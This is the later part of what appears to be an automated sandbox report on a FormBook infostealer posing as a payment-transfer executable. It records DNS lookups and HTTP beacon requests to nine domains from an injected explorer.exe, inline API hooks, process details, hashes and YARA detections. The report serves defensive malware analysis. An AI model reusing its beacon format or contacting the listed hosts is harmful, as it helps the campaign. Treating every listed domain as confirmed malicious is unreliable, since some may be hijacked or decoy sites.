Feb 23, 2021 09:47:53.287456036 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:48:01.781652927 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:48:01.831094027 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:48:06.034183025 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:48:06.091228962 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:48:13.808693886 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:48:14.101805925 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:48:34.894269943 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:48:35.082828999 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:48:37.297516108 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:48:37.350575924 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:48:39.326778889 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:48:39.386740923 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:48:53.921508074 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:48:53.988495111 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:16.361803055 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:16.425479889 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:31.398925066 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:31.484190941 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:32.265213966 CET | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:32.322531939 CET | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:33.882205009 CET | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:33.941507101 CET | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:35.224967957 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:35.285001993 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:35.759891033 CET | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:35.809756994 CET | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:36.397238970 CET | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:36.455867052 CET | 53 | 64910 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:37.063218117 CET | 52123 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:37.095645905 CET | 56130 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:37.148777008 CET | 53 | 56130 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:37.300690889 CET | 53 | 52123 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:37.957732916 CET | 56338 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:38.017211914 CET | 53 | 56338 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:38.840532064 CET | 59420 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:38.897531986 CET | 53 | 59420 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:39.493510008 CET | 58784 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:39.553536892 CET | 53 | 58784 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:49:57.674310923 CET | 63978 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:49:57.756051064 CET | 53 | 63978 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:50:18.129417896 CET | 62938 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:50:18.295779943 CET | 53 | 62938 | 8.8.8.8 | 192.168.2.3
Feb 23, 2021 09:50:38.837822914 CET | 55708 | 53 | 192.168.2.3 | 8.8.8.8
Feb 23, 2021 09:50:39.050357103 CET | 53 | 55708 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 09:47:53.216571093 CET | 192.168.2.3 | 8.8.8.8 | 0xaf8 | Standard query (0) | www.kanaai.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:48:13.808693886 CET | 192.168.2.3 | 8.8.8.8 | 0xa1fa | Standard query (0) | www.cvmjqcid.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:48:34.894269943 CET | 192.168.2.3 | 8.8.8.8 | 0xa314 | Standard query (0) | www.jaemagreci.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:48:53.921508074 CET | 192.168.2.3 | 8.8.8.8 | 0xc403 | Standard query (0) | www.sweetpopntreatz.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:49:16.361803055 CET | 192.168.2.3 | 8.8.8.8 | 0x6197 | Standard query (0) | www.long9000.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:49:37.063218117 CET | 192.168.2.3 | 8.8.8.8 | 0xdf87 | Standard query (0) | www.soheilvaseghi.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:49:57.674310923 CET | 192.168.2.3 | 8.8.8.8 | 0xa100 | Standard query (0) | www.gannahealing.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:50:18.129417896 CET | 192.168.2.3 | 8.8.8.8 | 0xf04b | Standard query (0) | www.olgadalila.com | A (IP address) | IN (0x0001)
Feb 23, 2021 09:50:38.837822914 CET | 192.168.2.3 | 8.8.8.8 | 0xcfd4 | Standard query (0) | www.zomapa.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 09:47:53.287456036 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8 | No error (0) | www.kanaai.com | www13.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:47:53.287456036 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8 | No error (0) | www13.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:47:53.287456036 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:47:53.287456036 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:47:53.287456036 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8 | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:48:14.101805925 CET | 8.8.8.8 | 192.168.2.3 | 0xa1fa | No error (0) | www.cvmjqcid.com | cvmjqcid.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:48:14.101805925 CET | 8.8.8.8 | 192.168.2.3 | 0xa1fa | No error (0) | cvmjqcid.com | | 210.152.86.132 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:48:35.082828999 CET | 8.8.8.8 | 192.168.2.3 | 0xa314 | No error (0) | www.jaemagreci.com | jaemagreci.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:48:35.082828999 CET | 8.8.8.8 | 192.168.2.3 | 0xa314 | No error (0) | jaemagreci.com | | 50.116.112.43 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:48:53.988495111 CET | 8.8.8.8 | 192.168.2.3 | 0xc403 | No error (0) | www.sweetpopntreatz.com | sweetpopntreatz.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:48:53.988495111 CET | 8.8.8.8 | 192.168.2.3 | 0xc403 | No error (0) | sweetpopntreatz.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:49:16.425479889 CET | 8.8.8.8 | 192.168.2.3 | 0x6197 | No error (0) | www.long9000.com | | 198.52.105.123 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:49:37.300690889 CET | 8.8.8.8 | 192.168.2.3 | 0xdf87 | No error (0) | www.soheilvaseghi.com | vaseghi.github.io | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:49:37.300690889 CET | 8.8.8.8 | 192.168.2.3 | 0xdf87 | No error (0) | vaseghi.github.io | | 185.199.108.153 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:49:37.300690889 CET | 8.8.8.8 | 192.168.2.3 | 0xdf87 | No error (0) | vaseghi.github.io | | 185.199.111.153 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:49:37.300690889 CET | 8.8.8.8 | 192.168.2.3 | 0xdf87 | No error (0) | vaseghi.github.io | | 185.199.109.153 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:49:37.300690889 CET | 8.8.8.8 | 192.168.2.3 | 0xdf87 | No error (0) | vaseghi.github.io | | 185.199.110.153 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:49:57.756051064 CET | 8.8.8.8 | 192.168.2.3 | 0xa100 | No error (0) | www.gannahealing.com | gannahealing.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:49:57.756051064 CET | 8.8.8.8 | 192.168.2.3 | 0xa100 | No error (0) | gannahealing.com | | 176.74.27.137 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:50:18.295779943 CET | 8.8.8.8 | 192.168.2.3 | 0xf04b | No error (0) | www.olgadalila.com | olgadalila.com | | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 09:50:18.295779943 CET | 8.8.8.8 | 192.168.2.3 | 0xf04b | No error (0) | olgadalila.com | | 198.27.88.111 | A (IP address) | IN (0x0001)
Feb 23, 2021 09:50:39.050357103 CET | 8.8.8.8 | 192.168.2.3 | 0xcfd4 | No error (0) | www.zomapa.com | | 164.155.144.220 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.kanaai.com
• www.cvmjqcid.com
• www.jaemagreci.com
• www.sweetpopntreatz.com
• www.long9000.com
• www.soheilvaseghi.com
• www.gannahealing.com
• www.olgadalila.com
• www.zomapa.com

                                                            HTTP Packets

                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            0 | 192.168.2.3 | 49726 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:47:53.367204905 CET | 1353 | OUT | GET /blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.kanaai.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:47:53.479753971 CET | 1354 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 23 Feb 2021 08:47:53 GMT
                                                            Content-Length: 0
                                                            Connection: close
                                                            location: https://www.kanaai.com/blr?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L
                                                            strict-transport-security: max-age=120
                                                            x-wix-request-id: 1614070073.418552239871121903
                                                            Age: 0
                                                            Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                            X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkViPPFLGwJgVO8FUAmFQQjPN,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,2d58ifebGbosy5xc+FRaluwwFBK7ql/Bn4PhplCINftSbYW2c4RZurCpWsQpzdtD3fKEXQvQlSAkB/lstal9R9ihGhmRXRA447Fw/kR9qdQ=,2UNV7KOq4oGjA5+PKsX47PP4j9yVJ2TZnllsg4qz4cE=,l7Ey5khejq81S7sxGe5Nk7KjdHHF98Vyi2aTDlfeOxdXz5t7NzGxeu2CXkk1aB7ZGlsroP2XR0N+rjgJK/PU9A==,4EmzKGKKpFffqfFwZRPY8dyCbNiRyM7+ZTNlULwu4/eFl6yP+RXtdTBOj4nQbF2lOOC/fp3nJ3UUnFruSOQYow==
                                                            Cache-Control: no-cache
                                                            Expires: -1
                                                            Server: Pepyaka/1.19.0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            1 | 192.168.2.3 | 49735 | 210.152.86.132 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:48:14.400055885 CET | 5114 | OUT | GET /blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.cvmjqcid.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:48:14.694118977 CET | 5115 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.16.1
                                                            Date: Tue, 23 Feb 2021 08:48:14 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: close
                                                            Location: http://merukore.jp/blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            2 | 192.168.2.3 | 49736 | 50.116.112.43 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:48:35.246251106 CET | 5116 | OUT | GET /blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.jaemagreci.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:48:36.268591881 CET | 5117 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 23 Feb 2021 08:48:35 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Location: http://jaemagreci.com
                                                            Content-Length: 0
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            3 | 192.168.2.3 | 49739 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:48:54.032861948 CET | 5136 | OUT | GET /blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.sweetpopntreatz.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:48:54.174190044 CET | 5137 | IN | HTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Tue, 23 Feb 2021 08:48:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6031584e-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            4 | 192.168.2.3 | 49740 | 198.52.105.123 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:49:16.624357939 CET | 5138 | OUT | GET /blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.long9000.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:49:16.870922089 CET | 5139 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:44:23 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            5 | 192.168.2.3 | 49748 | 185.199.108.153 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:49:37.345757961 CET | 5531 | OUT | GET /blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.soheilvaseghi.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:49:37.472671032 CET | 5533 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: GitHub.com
                                                            Content-Type: text/html
                                                            Location: https://soheilvaseghi.com/blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L
                                                            X-GitHub-Request-Id: 2C62:B000:9F860:ADCCB:6034C1A1
                                                            Content-Length: 162
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 23 Feb 2021 08:49:37 GMT
                                                            Via: 1.1 varnish
                                                            Age: 0
                                                            Connection: close
                                                            X-Served-By: cache-hhn4039-HHN
                                                            X-Cache: MISS
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1614070177.383340,VS0,VE84
                                                            Vary: Accept-Encoding
                                                            X-Fastly-Request-ID: 28473c359bf380142872393ca46bb19149a93093
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            6 | 192.168.2.3 | 49752 | 176.74.27.137 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:49:57.812186003 CET | 6008 | OUT | GET /blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.gannahealing.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:49:57.873881102 CET | 6009 | IN | HTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:49:57 GMT
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Content-Length: 343
                                                            Connection: close
                                                            Location: http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L
                                                            Cache-Control: max-age=172800
                                                            Expires: Thu, 25 Feb 2021 08:49:57 GMT
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&amp;Yn=ybdDmfdPTbAT8L">here</a>.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            7 | 192.168.2.3 | 49753 | 198.27.88.111 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:50:18.432307005 CET | 6010 | OUT | GET /blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.olgadalila.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:50:18.584054947 CET | 6010 | IN | HTTP/1.1 502 Bad Gateway
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:50:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            8 | 192.168.2.3 | 49754 | 164.155.144.220 | 80 | C:\Windows\explorer.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Feb 23, 2021 09:50:39.257392883 CET | 6011 | OUT | GET /blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L HTTP/1.1
                                                            Host: www.zomapa.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Feb 23, 2021 09:50:39.465549946 CET | 6011 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Tue, 23 Feb 2021 08:50:39 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 1.0


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function Name | Hook Type | Active in Processes
                                                            PeekMessageA | INLINE | explorer.exe
                                                            PeekMessageW | INLINE | explorer.exe
                                                            GetMessageW | INLINE | explorer.exe
                                                            GetMessageA | INLINE | explorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: user32.dll
                                                            Function Name | Hook Type | New Data
                                                            PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEA
                                                            PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                                            GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                                            GetMessageA | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEA

                                                            Statistics

                                                            Behavior

                                                            System Behavior

                                                            General

                                                            Start time: 09:46:47
                                                            Start date: 23/02/2021
                                                            Path: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            Wow64 process (32bit): true
                                                            Commandline: 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
                                                            Imagebase: 0x7ffb73670000
                                                            File size: 716288 bytes
                                                            MD5 hash: 5F1C9C4A7BC24C3D39A5A3834BA7BB8E
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: .Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation: low

                                                            General

                                                            Start time: 09:46:55
                                                            Start date: 23/02/2021
                                                            Path: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            Wow64 process (32bit): true
                                                            Commandline: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            Imagebase: 0x7ffb73670000
                                                            File size: 716288 bytes
                                                            MD5 hash: 5F1C9C4A7BC24C3D39A5A3834BA7BB8E
                                                            Has elevated privileges: true
                                                            Has administrator privileges: true
                                                            Programmed in: C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

General

Start time: 09:46:57
Start date: 23/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:47:11
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\explorer.exe
Imagebase: 0x330000
File size: 3611360 bytes
MD5 hash: 166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
